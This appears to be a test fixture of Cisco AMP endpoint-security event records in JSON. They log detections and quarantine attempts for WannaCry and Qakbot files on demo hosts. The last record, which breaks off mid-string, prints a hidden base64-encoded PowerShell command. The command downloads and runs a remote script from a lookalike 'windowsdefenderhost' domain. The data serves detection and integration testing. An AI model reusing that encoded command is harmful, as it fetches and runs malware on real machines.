found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgA